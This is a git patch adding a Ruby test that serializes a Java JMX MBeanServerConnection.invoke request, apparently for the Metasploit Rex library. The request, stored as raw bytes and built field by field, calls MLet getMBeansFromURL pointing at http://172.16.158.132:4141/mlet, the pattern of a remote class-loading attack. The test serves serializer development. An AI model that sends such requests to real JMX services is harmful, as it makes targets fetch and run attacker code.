From a5ae2aadeedebc4f546ffa45f31c2548069de53f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 14 Jan 2015 11:44:39 -0600
Subject: [PATCH] Add spec for MBeanServerConnection.invoke stream

---
 .../java/serialization/model/stream_spec.rb   | 154 ++++++++++++++++++
 1 file changed, 154 insertions(+)

diff --git a/spec/lib/rex/java/serialization/model/stream_spec.rb b/spec/lib/rex/java/serialization/model/stream_spec.rb
index 52e2c47884..05664985c5 100644
--- a/spec/lib/rex/java/serialization/model/stream_spec.rb
+++ b/spec/lib/rex/java/serialization/model/stream_spec.rb
@@ -142,6 +142,33 @@ describe Rex::Java::Serialization::Model::Stream do
     "\x2c\x69\x64\x3d\x31\x78\x70"
   end
 
+  let(:mbean_invoke) do
+  "\xac\xed\x00\x05\x77\x22\xe3\xba\xbd\x14\xa0\x0e\x72\x74\x4a\x7d" +
+  "\x3f\x10\x00\x00\x01\x4a\xe3\xed\x2f\x53\x81\x2e\xff\xff\xff\xff" +
+  "\x13\xe7\xd6\x94\x17\xe5\xda\x20\x73\x72\x00\x1b\x6a\x61\x76\x61" +
+  "\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a" +
+  "\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03" +
+  "\x00\x00\x70\x78\x70\x74\x00\x17\x44\x65\x66\x61\x75\x6c\x74\x44" +
+  "\x6f\x6d\x61\x69\x6e\x3a\x74\x79\x70\x65\x3d\x4d\x4c\x65\x74\x78" +
+  "\x74\x00\x10\x67\x65\x74\x4d\x42\x65\x61\x6e\x73\x46\x72\x6f\x6d" +
+  "\x55\x52\x4c\x73\x72\x00\x19\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e" +
+  "\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x4f\x62\x6a\x65\x63\x74" +
+  "\x7c\xbd\x1e\x97\xed\x63\xfc\x3e\x02\x00\x03\x49\x00\x04\x68\x61" +
+  "\x73\x68\x5b\x00\x08\x6c\x6f\x63\x42\x79\x74\x65\x73\x74\x00\x02" +
+  "\x5b\x42\x5b\x00\x08\x6f\x62\x6a\x42\x79\x74\x65\x73\x71\x00\x7e" +
+  "\x00\x05\x70\x78\x70\x72\x69\x21\xc6\x70\x75\x72\x00\x02\x5b\x42" +
+  "\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x70\x78\x70\x00\x00" +
+  "\x00\x4e\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61" +
+  "\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58" +
+  "\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" +
+  "\x1f\x68\x74\x74\x70\x3a\x2f\x2f\x31\x37\x32\x2e\x31\x36\x2e\x31" +
+  "\x35\x38\x2e\x31\x33\x32\x3a\x34\x31\x34\x31\x2f\x6d\x6c\x65\x74" +
+  "\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e" +
+  "\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02" +
+  "\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61" +
+  "\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x70"
+  end
+
   describe ".new" do
     it "Rex::Java::Serialization::Model::Stream" do
       expect(stream).to be_a(Rex::Java::Serialization::Model::Stream)
@@ -384,6 +411,133 @@ describe Rex::Java::Serialization::Model::Stream do
 
       end
     end
+
+    context "when serializing a MBeanServerConnection.invoke call data" do
+      it "serializes the stream correctly" do
+        block_data = Rex::Java::Serialization::Model::BlockData.new
+        block_data.contents = "\xe3\xba\xbd\x14\xa0\x0e\x72\x74\x4a\x7d\x3f\x10\x00\x00\x01\x4a\xe3\xed\x2f\x53\x81\x2e"
+        block_data.contents  << "\xff\xff\xff\xff\x13\xe7\xd6\x94\x17\xe5\xda\x20"
+        block_data.length = block_data.contents.length
+
+        stream.contents << block_data
+
+        new_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+        new_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'javax.management.ObjectName')
+        new_class_desc.serial_version = 0xf03a71beb6d15cf
+        new_class_desc.flags = 3
+        new_class_desc.fields = []
+        new_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+        new_class_desc.class_annotation.contents = [
+            Rex::Java::Serialization::Model::NullReference.new,
+            Rex::Java::Serialization::Model::EndBlockData.new
+        ]
+        new_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+        new_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+        new_object = Rex::Java::Serialization::Model::NewObject.new
+        new_object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+        new_object.class_desc.description = new_class_desc
+        new_object.class_data = []
+
+        stream.contents << new_object
+        stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'DefaultDomain:type=MLet')
+        stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
+
+        stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'getMBeansFromURL')
+
+        marshall_object_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+        marshall_object_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.rmi.MarshalledObject')
+        marshall_object_class_desc.serial_version = 0x7cbd1e97ed63fc3e
+        marshall_object_class_desc.flags = 2
+        marshall_object_class_desc.fields = [
+            Rex::Java::Serialization::Model::Field.new,
+            Rex::Java::Serialization::Model::Field.new,
+            Rex::Java::Serialization::Model::Field.new
+        ]
+
+        marshall_object_class_desc.fields[0].type = 'int'
+        marshall_object_class_desc.fields[0].name = Rex::Java::Serialization::Model::Utf.new(nil, 'hash')
+
+        marshall_object_class_desc.fields[1].type = 'array'
+        marshall_object_class_desc.fields[1].name = Rex::Java::Serialization::Model::Utf.new(nil, 'locBytes')
+        marshall_object_class_desc.fields[1].field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
+
+        marshall_object_class_desc.fields[2].type = 'array'
+        marshall_object_class_desc.fields[2].name = Rex::Java::Serialization::Model::Utf.new(nil, 'objBytes')
+        marshall_object_class_desc.fields[2].field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
+
+        marshall_object_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+        marshall_object_class_desc.class_annotation.contents = [
+            Rex::Java::Serialization::Model::NullReference.new,
+            Rex::Java::Serialization::Model::EndBlockData.new
+        ]
+        marshall_object_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+        marshall_object_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+
+        data_binary_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+        data_binary_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
+        data_binary_class_desc.serial_version = 0xacf317f8060854e0
+        data_binary_class_desc.flags = 2
+        data_binary_class_desc.fields = []
+        data_binary_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+        data_binary_class_desc.class_annotation.contents = [
+            Rex::Java::Serialization::Model::NullReference.new,
+            Rex::Java::Serialization::Model::EndBlockData.new
+        ]
+        data_binary_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+        data_binary_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+        data_binary = Rex::Java::Serialization::Model::NewArray.new
+        data_binary.array_description = Rex::Java::Serialization::Model::ClassDesc.new
+        data_binary.array_description.description = data_binary_class_desc
+        data_binary.type = 'byte'
+        # TODO: look into it
+        data_binary.values = [-84, -19, 0, 5, 117, 114, 0, 19, 91, 76, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 79, 98, 106, 101, 99, 116, 59, -112, -50, 88, -97, 16, 115, 41, 108, 2, 0, 0, 120, 112, 0, 0, 0, 1, 116, 0, 31, 104, 116, 116, 112, 58, 47, 47, 49, 55, 50, 46, 49, 54, 46, 49, 53, 56, 46, 49, 51, 50, 58, 52, 49, 52, 49, 47, 109, 108, 101, 116]
+
+        marshall_object = Rex::Java::Serialization::Model::NewObject.new
+        marshall_object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+        marshall_object.class_desc.description = marshall_object_class_desc
+        marshall_object.class_data = [
+            ["int", 1919492550],
+            Rex::Java::Serialization::Model::NullReference.new,
+            data_binary
+        ]
+
+        stream.contents << marshall_object
+
+        new_array_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+        new_array_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, '[Ljava.lang.String;')
+        new_array_class_desc.serial_version = 0xadd256e7e91d7b47
+        new_array_class_desc.flags = 2
+        new_array_class_desc.fields = []
+        new_array_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+        new_array_class_desc.class_annotation.contents = [
+            Rex::Java::Serialization::Model::NullReference.new,
+            Rex::Java::Serialization::Model::EndBlockData.new
+        ]
+        new_array_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+        new_array_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+        new_array = Rex::Java::Serialization::Model::NewArray.new
+        new_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
+        new_array.array_description.description = new_array_class_desc
+        new_array.type = 'java.lang.String;'
+        new_array.values = [
+          Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String')
+        ]
+
+        stream.contents << new_array
+
+        stream.contents << Rex::Java::Serialization::Model::NullReference.new
+
+        f = File.new('/tmp/test.bin', 'wb')
+        f.write(stream.encode)
+        f.close
+
+        expect(stream.encode).to eq(mbean_invoke)
+      end
+    end
   end
 
 end
\ No newline at end of file